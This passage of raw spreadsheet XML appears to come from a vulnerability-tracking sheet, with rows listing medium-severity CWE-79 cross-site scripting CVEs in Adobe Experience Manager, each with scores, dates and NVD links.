t="inlineStr"><is><t>CVE-2026-75678</t></is></c><c r="D1396" s="5" t="n"><v>5.4</v></c><c r="E1396" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1396" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1396" s="5" t="inlineStr" /><c r="H1396" s="5" t="n"><v>0.003</v></c><c r="I1396" s="5" t="inlineStr" /><c r="J1396" s="5" t="inlineStr" /><c r="K1396" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1396" s="5" t="inlineStr" /><c r="M1396" s="5" t="inlineStr" /><c r="N1396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1396" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1396" s="5" t="inlineStr" /><c r="R1396" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75678</t></is></c></row><row r="1397"><c r="A1397" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1397" s="5" t="inlineStr"><is><t>CVE-2026-75679</t></is></c><c r="D1397" s="5" t="n"><v>5.4</v></c><c r="E1397" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1397" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1397" s="5" t="inlineStr" /><c r="H1397" s="5" t="n"><v>0.003</v></c><c r="I1397" s="5" t="inlineStr" /><c r="J1397" s="5" t="inlineStr" /><c r="K1397" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1397" s="5" t="inlineStr" /><c r="M1397" s="5" t="inlineStr" /><c r="N1397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1397" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1397" s="5" t="inlineStr" /><c r="R1397" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75679</t></is></c></row><row r="1398"><c r="A1398" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1398" s="5" t="inlineStr"><is><t>CVE-2026-75680</t></is></c><c r="D1398" s="5" t="n"><v>5.4</v></c><c r="E1398" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1398" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1398" s="5" t="inlineStr" /><c r="H1398" s="5" t="n"><v>0.003</v></c><c r="I1398" s="5" t="inlineStr" /><c r="J1398" s="5" t="inlineStr" /><c r="K1398" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1398" s="5" t="inlineStr" /><c r="M1398" s="5" t="inlineStr" /><c r="N1398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1398" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1398" s="5" t="inlineStr" /><c r="R1398" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75680</t></is></c></row><row r="1399"><c r="A1399" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1399" s="5" t="inlineStr"><is><t>CVE-2026-75681</t></is></c><c r="D1399" s="5" t="n"><v>5.4</v></c><c r="E1399" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1399" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1399" s="5" t="inlineStr" /><c r="H1399" s="5" t="n"><v>0.003</v></c><c r="I1399" s="5" t="inlineStr" /><c r="J1399" s="5" t="inlineStr" /><c r="K1399" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1399" s="5" t="inlineStr" /><c r="M1399" s="5" t="inlineStr" /><c r="N1399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1399" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1399" s="5" t="inlineStr" /><c r="R1399" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75681</t></is></c></row><row r="1400"><c r="A1400" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1400" s="5" t="inlineStr"><is><t>CVE-2026-75683</t></is></c><c r="D1400" s="5" t="n"><v>5.4</v></c><c r="E1400" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1400" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1400" s="5" t="inlineStr" /><c r="H1400" s="5" t="n"><v>0.003</v></c><c r="I1400" s="5" t="inlineStr" /><c r="J1400" s="5" t="inlineStr" /><c r="K1400" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1400" s="5" t="inlineStr" /><c r="M1400" s="5" t="inlineStr" /><c r="N1400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1400" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1400" s="5" t="inlineStr" /><c r="R1400" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75683</t></is></c></row><row r="1401"><c r="A1401" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1401" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1401" s="5" t="inlineStr"><is><t>CVE-2026-75685</t></is></c><c r="D1401" s="5" t="n"><v>5.4</v></c><c r="E1401" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1401" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1401" s="5" t="inlineStr" /><c r="H1401" s="5" t="n"><v>0.003</v></c><c r="I1401" s="5" t="inlineStr" /><c r="J1401" s="5" t="inlineStr" /><c r="K1401" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1401" s="5" t="inlineStr" /><c r="M1401" s="5" t="inlineStr" /><c r="N1401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1401" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1401" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1401" s="5" t="inlineStr" /><c r="R1401" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75685</t></is></c></row><row r="1402"><c r="A1402" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1402" s="5" t="inlineStr"><is><t>CVE-2026-75687</t></is></c><c r="D1402" s="5" t="n"><v>5.4</v></c><c r="E1402" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1402" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1402" s="5" t="inlineStr" /><c r="H1402" s="5" t="n"><v>0.003</v></c><c r="I1402" s="5" t="inlineStr" /><c r="J1402" s="5" t="inlineStr" /><c r="K1402" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1402" s="5" t="inlineStr" /><c r="M1402" s="5" t="inlineStr" /><c r="N1402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1402" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1402" s="5" t="inlineStr" /><c r="R1402" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75687</t></is></c></row><row r="1403"><c r="A1403" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1403" s="5" t="inlineStr"><is><t>CVE-2026-75690</t></is></c><c r="D1403" s="5" t="n"><v>5.4</v></c><c r="E1403" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1403" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1403" s="5" t="inlineStr" /><c r="H1403" s="5" t="n"><v>0.003</v></c><c r="I1403" s="5" t="inlineStr" /><c r="J1403" s="5" t="inlineStr" /><c r="K1403" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1403" s="5" t="inlineStr" /><c r="M1403" s="5" t="inlineStr" /><c r="N1403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1403" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1403" s="5" t="inlineStr" /><c r="R1403" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75690</t></is></c></row><row r="1404"><c r="A1404" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1404" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1404" s="5" t="inlineStr"><is><t>CVE-2026-75691</t></is></c><c r="D1404" s="5" t="n"><v>5.4</v></c><c r="E1404" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1404" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1404" s="5" t="inlineStr" /><c r="H1404" s="5" t="n"><v>0.003</v></c><c r="I1404" s="5" t="inlineStr" /><c r="J1404" s="5" t="inlineStr" /><c r="K1404" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1404" s="5" t="inlineStr" /><c r="M1404" s="5" t="inlineStr" /><c r="N1404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1404" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1404" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1404" s="5" t="inlineStr" /><c r="R1404" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75691</t></is></c></row><row r="1405"><c r="A1405" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1405" s="5" t="inlineStr"><is><t>CVE-2026-75692</t></is></c><c r="D1405" s="5" t="n"><v>5.4</v></c><c r="E1405" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1405" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1405" s="5" t="inlineStr" /><c r="H1405" s="5" t="n"><v>0.003</v></c><c r="I1405" s="5" t="inlineStr" /><c r="J1405" s="5" t="inlineStr" /><c r="K1405" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1405" s="5" t="inlineStr" /><c r="M1405" s="5" t="inlineStr" /><c r="N1405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1405" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1405" s="5" t="inlineStr" /><c r="R1405" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75692</t></is></c></row><row r="1406"><c r="A1406" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1406" s="5" t="inlineStr"><is><t>CVE-2026-75693</t></is></c><c r="D1406" s="5" t="n"><v>5.4</v></c><c r="E1406" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1406" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1406" s="5" t="inlineStr" /><c r="H1406" s="5" t="n"><v>0.003</v></c><c r="I1406" s="5" t="inlineStr" /><c r="J1406" s="5" t="inlineStr" /><c r="K1406" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1406" s="5" t="inlineStr" /><c r="M1406" s="5" t="inlineStr" /><c r="N1406" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1406" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1406" s="5" t="inlineStr" /><c r="R1406" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75693</t></is></c></row><row r="1407"><c r="A1407" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1407" s="5" t="inlineStr"><is><t>CVE-2026-75694</t></is></c><c r="D1407" s="5" t="n"><v>5.4</v></c><c r="E1407" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1407" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1407" s="5" t="inlineStr" /><c r="H1407" s="5" t="n"><v>0.003</v></c><c r="I1407" s="5" t="inlineStr" /><c r="J1407" s="5" t="inlineStr" /><c r="K1407" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1407" s="5" t="inlineStr" /><c r="M1407" s="5" t="inlineStr" /><c r="N1407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1407" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1407" s="5" t="inlineStr" /><c r="R1407" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75694</t></is></c></row><row r="1408"><c r="A1408" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1408" s="5" t="inlineStr"><is><t>CVE-2026-75695</t></is></c><c r="D1408" s="5" t="n"><v>5.4</v></c><c r="E1408" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1408" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1408" s="5" t="inlineStr" /><c r="H1408" s="5" t="n"><v>0.003</v></c><c r="I1408" s="5" t="inlineStr" /><c r="J1408" s="5" t="inlineStr" /><c r="K1408" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1408" s="5" t="inlineStr" /><c r="M1408" s="5" t="inlineStr" /><c r="N1408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1408" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1408" s="5" t="inlineStr" /><c r="R1408" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75695</t></is></c></row><row r="1409"><c r="A1409" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1409" s="5" t="inlineStr"><is><t>CVE-2026-75696</t></is></c><c r="D1409" s="5" t="n"><v>5.4</v></c><c r="E1409" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1409" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1409" s="5" t="inlineStr" /><c r="H1409" s="5" t="n"><v>0.003</v></c><c r="I1409" s="5" t="inlineStr" /><c r="J1409" s="5" t="inlineStr" /><c r="K1409" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1409" s="5" t="inlineStr" /><c r="M1409" s="5" t="inlineStr" /><c r="N1409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1409" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1409" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1409" s="5" t="inlineStr" /><c r="R1409" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75696</t></is></c></row><row r="1410"><c r="A1410" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1410" s="5" t="inlineStr"><is><t>CVE-2026-75700</t></is></c><c r="D1410" s="5" t="n"><v>5.4</v></c><c r="E1410" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1410" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1410" s="5" t="inlineStr" /><c r="H1410" s="5" t="n"><v>0.003</v></c><c r="I1410" s="5" t="inlineStr" /><c r="J1410" s="5" t="inlineStr" /><c r="K1410" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1410" s="5" t="inlineStr" /><c r="M1410" s="5" t="inlineStr" /><c r="N1410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1410" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1410" s="5" t="inlineStr" /><c r="R1410" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75700</t></is></c></row><row r="1411"><c r="A1411" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1411" s="5" t="inlineStr"><is><t>CVE-2026-75701</t></is></c><c r="D1411" s="5" t="n"><v>5.4</v></c><c r="E1411" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1411" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1411" s="5" t="inlineStr" /><c r="H1411" s="5" t="n"><v>0.003</v></c><c r="I1411" s="5" t="inlineStr" /><c r="J1411" s="5" t="inlineStr" /><c r="K1411" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1411" s="5" t="inlineStr" /><c r="M1411" s="5" t="inlineStr" /><c r="N1411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1411" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1411" s="5" t="inlineStr" /><c r="R1411" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75701</t></is></c></row><row r="1412"><c r="A1412" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1412" s="5" t="inlineStr"><is><t>CVE-2026-75702</t></is></c><c r="D1412" s="5" t="n"><v>5.4</v></c><c r="E1412" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1412" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1412" s="5" t="inlineStr" /><c r="H1412" s="5" t="n"><v>0.003</v></c><c r="I1412" s="5" t="inlineStr" /><c r="J1412" s="5" t="inlineStr" /><c r="K1412" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1412" s="5" t="inlineStr" /><c r="M1412" s="5" t="inlineStr" /><c r="N1412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1412" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1412" s="5" t="inlineStr" /><c r="R1412" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75702</t></is></c></row><row r="1413"><c r="A1413" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1413" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1413" s="5" t="inlineStr"><is><t>CVE-2026-75704</t></is></c><c r="D1413" s="5" t="n"><v>5.4</v></c><c r="E1413" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1413" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1413" s="5" t="inlineStr" /><c r="H1413" s="5" t="n"><v>0.003</v></c><c r="I1413" s="5" t="inlineStr" /><c r="J1413" s="5" t="inlineStr" /><c r="K1413" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1413" s="5" t="inlineStr" /><c r="M1413" s="5" t="inlineStr" /><c r="N1413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1413" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1413" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1413" s="5" t="inlineStr" /><c r="R1413" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75704</t></is></c></row><row r="1414"><c r="A1414" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1414" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1414" s="5" t="inlineStr"><is><t>CVE-2026-75705</t></is></c><c r="D1414" s="5" t="n"><v>5.4</v></c><c r="E1414" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1414" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1414" s="5" t="inlineStr" /><c r="H1414" s="5" t="n"><v>0.003</v></c><c r="I1414" s="5" t="inlineStr" /><c r="J1414" s="5" t="inlineStr" /><c r="K1414" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1414" s="5" t="inlineStr" /><c r="M1414" s="5" t="inlineStr" /><c r="N1414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1414" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1414" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1414" s="5" t="inlineStr" /><c r="R1414" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75705</t></is></c></row><row r="1415"><c r="A1415" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1415" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1415" s="5" t="inlineStr"><is><t>CVE-2026-75706</t></is></c><c r="D1415" s="5" t="n"><v>5.4</v></c><c r="E1415" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1415" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1415" s="5" t="inlineStr" /><c r="H1415" s="5" t="n"><v>0.003</v></c><c r="I1415" s="5" t="inlineStr" /><c r="J1415" s="5" t="inlineStr" /><c r="K1415" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1415" s="5" t="inlineStr" /><c r="M1415" s="5" t="inlineStr" /><c r="N1415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1415" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1415" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1415" s="5" t="inlineStr" /><c r="R1415" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75706</t></is></c></row><row r="1416"><c r="A1416" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1416" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1416" s="5" t="inlineStr"><is><t>CVE-2026-75707</t></is></c><c r="D1416" s="5" t="n"><v>5.4</v></c><c r="E1416" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1416" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1416" s="5" t="inlineStr" /><c r="H1416" s="5" t="n"><v>0.003</v></c><c r="I1416" s="5" t="inlineStr" /><c r="J1416" s="5" t="inlineStr" /><c r="K1416" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1416" s="5" t="inlineStr" /><c r="M1416" s="5" t="inlineStr" /><c r="N1416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1416" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1416" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1416" s="5" t="inlineStr" /><c r="R1416" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75707</t></is></c></row><row r="1417"><c r="A1417" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1417" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1417" s="5" t="inlineStr"><is><t>CVE-2026-75708</t></is></c><c r="D1417" s="5" t="n"><v>5.4</v></c><c r="E1417" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1417" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1417" s="5" t="inlineStr" /><c r="H1417" s="5" t="n"><v>0.003</v></c><c r="I1417" s="5" t="inlineStr" /><c r="J1417" s="5" t="inlineStr" /><c r="K1417" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1417" s="5" t="inlineStr" /><c r="M1417" s="5" t="inlineStr" /><c r="N1417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1417" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1417" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1417" s="5" t="inlineStr" /><c r="R1417" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75708</t></is></c></row><row r="1418"><c r="A1418" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1418" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1418" s="5" t="inlineStr"><is><t>CVE-2026-75709</t></is></c><c r="D1418" s="5" t="n"><v>5.4</v></c><c r="E1418" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1418" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1418" s="5" t="inlineStr" /><c r="H1418" s="5" t="n"><v>0.003</v></c><c r="I1418" s="5" t="inlineStr" /><c r="J1418" s="5" t="inlineStr" /><c r="K1418" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1418" s="5" t="inlineStr" /><c r="M1418" s="5" t="inlineStr" /><c r="N1418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1418" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1418" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1418" s="5" t="inlineStr" /><c r="R1418" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75709</t></is></c></row><row r="1419"><c r="A1419" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1419" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1419" s="5" t="inlineStr"><is><t>CVE-2026-75710</t></is></c><c r="D1419" s="5" t="n"><v>5.4</v></c><c r="E1419" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1419" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1419" s="5" t="inlineStr" /><c r="H1419" s="5" t="n"><v>0.003</v></c><c r="I1419" s="5" t="inlineStr" /><c r="J1419" s="5" t="inlineStr" /><c r="K1419" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1419" s="5" t="inlineStr" /><c r="M1419" s="5" t="inlineStr" /><c r="N1419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1419" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1419" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1419" s="5" t="inlineStr" /><c r="R1419" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75710</t></is></c></row><row r="1420"><c r="A1420" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1420" s="5" t="inlineStr"><is><t>CVE-2026-75711</t></is></c><c r="D1420" s="5" 